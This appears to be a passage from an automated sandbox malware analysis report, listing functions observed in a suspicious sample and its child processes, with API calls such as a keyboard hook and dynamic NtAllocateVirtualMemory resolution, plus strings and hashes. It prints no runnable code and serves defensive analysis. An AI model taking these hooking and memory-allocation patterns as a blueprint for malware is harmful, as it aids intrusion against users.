Instruction Fuzzy Hash: 18F03059711711A6AB20BBFA6CC4A3F66CC8AA46A53440821FD01C7121D716FC4192B1

Uniqueness

Uniqueness Score: -1.00%

Function 042324FC Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 04232514
SetWindowsHookExA.USER32(00000003,042324B8,00000000,00000000), ref: 04232524
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0423253F
CreateThread.KERNEL32(00000000,000003E8,0423245C,00000000,00000000), ref: 04232563

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CreateThread$CurrentEventHookWindows
String ID:
API String ID: 1195359707-0
Opcode ID: 39e63b824e0d2ce06d890f22d58fa9c1bffa2c4133c0460dd9abd1f3360e480f
Instruction ID: 38a2be7154bc7d04cf9e210fb19275a2b6bc79c83ef002abc06d396294e7920f
Opcode Fuzzy Hash: 39e63b824e0d2ce06d890f22d58fa9c1bffa2c4133c0460dd9abd1f3360e480f
Instruction Fuzzy Hash: 7EF0FEB4F94345BEF724AB29BC5AF2D36B4D710B67F5050E5F2056A0C0C7B839818B25

Uniqueness

Uniqueness Score: -1.00%

Function 04207618 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 04207621
SelectObject.GDI32(00000000,058A00B4), ref: 04207633
GetTextMetricsA.GDI32(00000000), ref: 0420763E
ReleaseDC.USER32(00000000,00000000), ref: 0420764F

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: MetricsObjectReleaseSelectText
String ID:
API String ID: 2013942131-0
Opcode ID: a83df69b3a71b89c621d9e8b0b1fa90cd343817c16df7bf384bff0d0ec10f09c
Instruction ID: e1a5552733addb61eb8a54c0551b622f4596e1d4a25a5cf0afd1b9bf67bb25fc
Opcode Fuzzy Hash: a83df69b3a71b89c621d9e8b0b1fa90cd343817c16df7bf384bff0d0ec10f09c
Instruction Fuzzy Hash: 97E04F5175396223E711326A5CC1BBB7A8C8F525A5FC81161FD549A2C6DB05F90083FA

Uniqueness

Uniqueness Score: -1.00%

Function 042021F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 042014D8: EnterCriticalSection.KERNEL32(?,04201515), ref: 042014DC

CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,042023EC,?,00000000,04202414), ref: 04202327
CreateFontIndirectA.GDI32(?), ref: 042023C9

Strings

Default, xrefs: 042022EE, 042022FC, 042022FD

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CompareCreateCriticalEnterFontIndirectSectionString
String ID: Default
API String ID: 249151401-753088835
Opcode ID: 90d04e02974a06f65b784dbc63e144878ab6ecb7c3416654c4618193e91c995a
Instruction ID: 81e9d346986af85f7dd4f849955c5b59446c81d3ecd840e63adb1c6a837d46bc
Opcode Fuzzy Hash: 90d04e02974a06f65b784dbc63e144878ab6ecb7c3416654c4618193e91c995a
Instruction Fuzzy Hash: B4619C34B14248DFEB11DFA8C488B9DBBF5EF49304F5480A6E840A7292D770BE44DB65

Uniqueness

Uniqueness Score: -1.00%

Function 041E1D08 Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b143455e39f806a9025ce291fdeea086a532cf66a6a6547d4a574ee86863053c
Instruction ID: a4da95a1878bf3a67ff12df39a9eaea3a7393aa1b8012397fb533722ea21f9b9
Opcode Fuzzy Hash: b143455e39f806a9025ce291fdeea086a532cf66a6a6547d4a574ee86863053c
Instruction Fuzzy Hash: 84A1E66A710E005BE719AA7EACD43BDB3D19BC5725F1846BEE115CB280EB78E9458380

Uniqueness

Uniqueness Score: -1.00%

Function 041EA5EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,041EA6DA), ref: 041EA672
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,041EA6DA), ref: 041EA678

Strings

yyyy, xrefs: 041EA64D

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 72fbf48b3c94200fac994c849eca847de6b7f358f7220b154bfe269b39bc039a
Instruction ID: b25838919c6cf0c2df81f1b30eb2a52d555fff1fafbec0281bb7ca9e30eac4a8
Opcode Fuzzy Hash: 72fbf48b3c94200fac994c849eca847de6b7f358f7220b154bfe269b39bc039a
Instruction Fuzzy Hash: F4215E79A00A189BEB14DF96C9C1ABEB3B8EF0D740F4144A5E905E7250D734AE40DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0421A904 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

IntersectRect.USER32(?,?,?), ref: 0421A964
EqualRect.USER32(?,?), ref: 0421A974

Strings

@, xrefs: 0421A945

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Rect$EqualIntersect
String ID: @
API String ID: 3291753422-2766056989
Opcode ID: cbc18d0ac1d896cb12466ba29234260cad3ac865e903ab36d0426d2633c7346d
Instruction ID: 1fcb8f0daae142121084dbe9c311943c3807d65e0e5b39af31dd8d5296d2b735
Opcode Fuzzy Hash: cbc18d0ac1d896cb12466ba29234260cad3ac865e903ab36d0426d2633c7346d
Instruction Fuzzy Hash: 3411E331A152486BD710DBACCC84BEEBBE8AF49218F040291EC04DB391C731ED45CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0420AF38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 0420AF86
GetSystemMetrics.USER32(00000001), ref: 0420AF98

Part of subcall function 0420ACA4: GetProcAddress.KERNEL32(76BE0000,00000000), ref: 0420AD23

Strings

MonitorFromPoint, xrefs: 0420AF4A

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromPoint
API String ID: 1792783759-1072306578
Opcode ID: 7eddccff3e4a513ea7ea3f80bcbd362ff48a4db708379a56f008e5c68b022ae3
Instruction ID: f8fadc1a41a4f357fa46eb66b973c675a5c53c06d83c728126b63a5e42c502b8
Opcode Fuzzy Hash: 7eddccff3e4a513ea7ea3f80bcbd362ff48a4db708379a56f008e5c68b022ae3
Instruction Fuzzy Hash: 8D018BB1714315AFDB004E58E84C7DD77A5EBB47E5F808014F9159B1D2D3F6AC458790

Uniqueness

Uniqueness Score: -1.00%

Function 0420AE10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 0420AE61
GetSystemMetrics.USER32(00000001), ref: 0420AE6D

Part of subcall function 0420ACA4: GetProcAddress.KERNEL32(76BE0000,00000000), ref: 0420AD23

Strings

MonitorFromRect, xrefs: 0420AE25

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromRect
API String ID: 1792783759-4033241945
Opcode ID: 0003e6fe37c2e7371aebf806a0a0834d210a427f780860afc48f28b1a55379b2
Instruction ID: bc7d41e625c03abcbe1546d4ce2b8b05ab74963bff335593d45a6f419c5b31dc
Opcode Fuzzy Hash: 0003e6fe37c2e7371aebf806a0a0834d210a427f780860afc48f28b1a55379b2
Instruction Fuzzy Hash: F4016731710315ABEB108E18E988B5DB795DB547A5F84C461DA05DB182C378EC40CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0420AD88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 0420ADEA

Part of subcall function 0420ACA4: GetProcAddress.KERNEL32(76BE0000,00000000), ref: 0420AD23

GetSystemMetrics.USER32(?), ref: 0420ADB0

Strings

GetSystemMetrics, xrefs: 0420AD98

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: MetricsSystem$AddressProc
String ID: GetSystemMetrics
API String ID: 1792783759-96882338
Opcode ID: 9b52733f1a605c9131735122bf17134605ebe02811f80df6e43c956e1129d316
Instruction ID: 4a119d903b0e9e94850caaadaad432d8ef0d5bf5622630a1a393f7254c270d79
Opcode Fuzzy Hash: 9b52733f1a605c9131735122bf17134605ebe02811f80df6e43c956e1129d316
Instruction Fuzzy Hash: F3F090707343015FDB14EA3CE98823A35E9EBA6276FC0CA61A212C61C7E2FDB841D210

Uniqueness

Uniqueness Score: -1.00%

Function 042131E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 04213203
GetKeyState.USER32(00000011), ref: 04213214

Strings

, xrefs: 04213223

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: State
String ID:
API String ID: 1649606143-3916222277
Opcode ID: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
Instruction ID: c1913f7f4cb1c811e9a35c58d0f7efdb39c1919c5eb47220ed4c929013de8d2d
Opcode Fuzzy Hash: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
Instruction Fuzzy Hash: 00E0D866700B4222F613B9A93C407E757D24F637B8F0806AAFED41A1E1EA862D1691A1

Uniqueness

Uniqueness Score: -1.00%

Function 04238C28 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 04238C5C
IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 04238C8C
IsBadReadPtr.KERNEL32(?,00000008), ref: 04238CAB
IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 04238CB7

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: f0b00c3df094b11b5a48fba442859b1c5b70d8bc394c6ba809d978a3f1d86900
Instruction ID: 73589a03c2cd4004f43b486810a30cd46112535185c506e8962ed80273087adf
Opcode Fuzzy Hash: f0b00c3df094b11b5a48fba442859b1c5b70d8bc394c6ba809d978a3f1d86900
Instruction Fuzzy Hash: 6D21CDB070161A9BDF14EE29CC80BAE73B8EF80B22F404951FE10AB344D734F81186A4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: veaiqniF.pifPID: 7604, Parent PID: 7304COMMON

Non-executed Functions

Function 00430870 Relevance: 6.4, Strings: 5, Instructions: 121COMMON

Download Yara Rule

Strings

CreateWaitableTimerEx when creating timer failedparsing/packing of this type isn't available yetfailed to parse certificate #%d in the chain: %wtls: CurvePreferences includes unsupported curveCould not convert to time, passing current time.x509: X25519 key enc, xrefs: 00430A4D
%, xrefs: 00430A71
runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpall goroutines are asleep - deadlock!godebug: unexpected IncNonDefault of cannot create context from nil parenttoo many Authorities to pack (>65535)t, xrefs: 00430A68
VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerunexpected runtime.netpoll error: expected an RSA public key, got %Ttls: malformed key_sha, xrefs: 00430A32
bad g0 stackself-preemptbad recoverybad g statusentersyscallcas64 failedabi mismatchRCodeSuccessRCodeRefusedGetConsoleCPnot pollableremote errorc hs traffics hs trafficc ap traffics ap trafficclose notifyMime-VersionX-ImforwardsX-Powered-ByContent Type (sensit, xrefs: 00430A17

Memory Dump Source

Source File: 00000007.00000001.1488647701.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.1488647701.000000000088B000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.1488647701.000000000088F000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.1488647701.00000000008AB000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.1488647701.00000000008B5000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_veaiqniF.jbxd

Similarity

API ID:
String ID: %$CreateWaitableTimerEx when creating timer failedparsing/packing of this type isn't available yetfailed to parse certificate #%d in the chain: %wtls: CurvePreferences includes unsupported curveCould not convert to time, passing current time.x509: X25519 key enc$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerunexpected runtime.netpoll error: expected an RSA public key, got %Ttls: malformed key_sha$bad g0 stackself-preemptbad recoverybad g statusentersyscallcas64 failedabi mismatchRCodeSuccessRCodeRefusedGetConsoleCPnot pollableremote errorc hs traffics hs trafficc ap traffics ap trafficclose notifyMime-VersionX-ImforwardsX-Powered-ByContent Type (sensit$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpall goroutines are asleep - deadlock!godebug: unexpected IncNonDefault of cannot create context from nil parenttoo many Authorities to pack (>65535)t
API String ID: 0-1005992549
Opcode ID: 4f18a8ab7f1fc0e6ed754dd09081ecf5ba98835150bc7094af54289576bc5370
Instruction ID: d6b05460dce053fcb725ba51d2c67ca3e53d8b493b6d73661264cc7acd7f9677
Opcode Fuzzy Hash: 4f18a8ab7f1fc0e6ed754dd09081ecf5ba98835150bc7094af54289576bc5370
Instruction Fuzzy Hash: 4D51F4B45087018FD300EF25D194B5ABBF0BF8A718F009A6EE8988B392D739D945CF56

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Finqiaev.PIFPID: 7860, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	6.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	66
Total number of Limit Nodes:	5

Executed Functions

Function 0415FB80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0415FBB3

Strings

C:\Windows\System32\ntdll.dll, xrefs: 0415FB88
NtAllocateVirtualMemory, xrefs: 0415FB83

Memory Dump Source

Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 2167126740-2206134580
Opcode ID: faffa0968585e1ff1ea76a14b6e92873663f1d3d737bcbed4a26c3ff22c8445d
Instruction ID: f5eadc28b6132fa9abd6ac6f51650461e5a55a6f2add373bfc05d8ecbe269889
Opcode Fuzzy Hash: faffa0968585e1ff1ea76a14b6e92873663f1d3d737bcbed4a26c3ff22c8445d
Instruction Fuzzy Hash: 0AE0EEB2201208BBCB00EE98D981ECB37ECAB09644B004012BA18C7200C738E9108BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0414FACC Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantCopy.OLEAUT32 ref: 0414FAF2

Part of subcall function 0414F6D0: VariantClear.OLEAUT32 ref: 0414F6E4

Memory Dump Source

Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: b715666f21f15755dc116b4a8f1ceeb841bac2797fd231b1975db8e0e53b9110
Instruction ID: 34e9c39b62bf7c0532531dfb47ebc4c8c1b7e0766dbda2c1bdf59bbc06b4f8ff
Opcode Fuzzy Hash: b715666f21f15755dc116b4a8f1ceeb841bac2797fd231b1975db8e0e53b9110
Instruction Fuzzy Hash: C411A5607003108BEB24AF29C9D096777E9EFC67947198466E88A8F355DB30FC43D765

Uniqueness

Uniqueness Score: -1.00%

Function 0414F6D0 Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantClear.OLEAUT32 ref: 0414F6E4

Memory Dump Source

Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd

Yara matches

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 57071ad55ef89ba190d3c360e642005961a29ddd6d4d9db78aed7eebf15da778
Instruction ID: 7927a8b8bd330af4e869822e039215bc881c2444d2ea4f896b3c4f651ceaa7ea
Opcode Fuzzy Hash: 57071ad55ef89ba190d3c360e642005961a29ddd6d4d9db78aed7eebf15da778
Instruction Fuzzy Hash: 71F0F6B83002108AB7157F389DC49AA239DAFC064AB5154B5E4479B311DB3DFC4BD322

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0416AFD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 0416B001
GetSystemMetrics.USER32(00000000), ref: 0416B03D
GetSystemMetrics.USER32(00000001), ref: 0416B048

Strings

DISPLAY, xrefs: 0416B069
GetMonitorInfo, xrefs: 0416AFE8

Memory Dump Source

Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd

Yara matches

Similarity

API ID: MetricsSystem$InfoMonitor
String ID: DISPLAY$GetMonitorInfo
API String ID: 4250584380-1633989206
Opcode ID: bd1f52827f8d37f4ce5a56131002de208f02e578be1cdfd8a6e9e196e6d782e2
Instruction ID: f29501f1897ea40c21b5e2393293366adb60ae7e67c3a5fae4042fe19823a4a0
Opcode Fuzzy Hash: bd1f52827f8d37f4ce5a56131002de208f02e578be1cdfd8a6e9e196e6d782e2
Instruction Fuzzy Hash: 1011DC71606320AFE720CF6598847B7BBF8EF05350F004629E966D7240D7B8F8948BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0416B24C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 0416B285
GetSystemMetrics.USER32(00000000), ref: 0416B2AA
GetSystemMetrics.USER32(00000001), ref: 0416B2B5

Strings

EnumDisplayMonitors, xrefs: 0416B264

Memory Dump Source

Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd

Yara matches

Similarity

API ID: MetricsSystem$DisplayEnumMonitors
String ID: EnumDisplayMonitors
API String ID: 1389147845-2491903729
Opcode ID: 112756d956d6b6260bb60f01e4d15e454a2b73caa87b72c7419ece96771728da
Instruction ID: e27c4ddf7d9e4e98930f938f00339537632322488c3b4047ea93be720f1b03b4
Opcode Fuzzy Hash: 112756d956d6b6260bb60f01e4d15e454a2b73caa87b72c7419ece96771728da
Instruction Fuzzy Hash: 90313EB2A05219AFDB10DEA9C9C49FF77BCEF45200F044166E916E3240E738F924CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0416B0A4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 0416B111
GetSystemMetrics.USER32(00000001), ref: 0416B11C

Strings

GetMonitorInfoA, xrefs: 0416B0BC
DISPLAY, xrefs: 0416B13D

Memory Dump Source

Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID: DISPLAY$GetMonitorInfoA
API String ID: 4116985748-1370492664
Opcode ID: bade87dd959a5827cfd735d77c6781ca7ec7ecc9144cd79350548bae1cd6a635
Instruction ID: 7fafc0fe6759e908c6b69441b5911093db7b0d1d27d0ffbaaaf1367bd6418ba8
Opcode Fuzzy Hash: bade87dd959a5827cfd735d77c6781ca7ec7ecc9144cd79350548bae1cd6a635
Instruction Fuzzy Hash: 7311E171646324AFE720CF65A8C47A7B7A8EF05790F004529ED56D7240D3B8F8908BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0416B178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 0416B1E5
GetSystemMetrics.USER32(00000001), ref: 0416B1F0

Strings

DISPLAY, xrefs: 0416B211
GetMonitorInfoW, xrefs: 0416B190

Memory Dump Source

Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID: DISPLAY$GetMonitorInfoW
API String ID: 4116985748-2774842281
Opcode ID: 0b538257fa98759343728396b08cbc4f13f0aea78a7a91192824a38c884cf342
Instruction ID: 0af644a20a358bad4f4ab070b3791c82035cb5bc2dc30a0a1b78aff6a1e74e98
Opcode Fuzzy Hash: 0b538257fa98759343728396b08cbc4f13f0aea78a7a91192824a38c884cf342
Instruction Fuzzy Hash: 2F11AC716063209FE720CFA5A884BABB7E8EF45751F00852DED56E7240D7B5F894CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0416AF38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 0416AF86
GetSystemMetrics.USER32(00000001), ref: 0416AF98

Strings

MonitorFromPoint, xrefs: 0416AF4A

Memory Dump Source

Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID: MonitorFromPoint
API String ID: 4116985748-1072306578
Opcode ID: b65acb9da22eb9b9046d889f51e1ec847ecedc1d53c8631f82b020709680b71d
Instruction ID: fcd06bf61363ba6778c2eabbecbaa88c2023427a19bd5e25fd740ef2c822c1e5
Opcode Fuzzy Hash: b65acb9da22eb9b9046d889f51e1ec847ecedc1d53c8631f82b020709680b71d
Instruction Fuzzy Hash: 6201A2B1302244EFEB008E55D884B9DBB65EF863D5F004198FE06EB240D3B4FCA187A1

Uniqueness

Uniqueness Score: -1.00%

Function 0416AE10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 0416AE61
GetSystemMetrics.USER32(00000001), ref: 0416AE6D

Strings

MonitorFromRect, xrefs: 0416AE25

Memory Dump Source

Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID: MonitorFromRect
API String ID: 4116985748-4033241945
Opcode ID: 7803b0490fcba4a2daea5138e30f98f3625c50713645bcbaa5937a0e09de48dd
Instruction ID: 7f0dc1c240ed31039dc3f0ad58c7bdfca2230987aefbe03f951761f5a42a982b
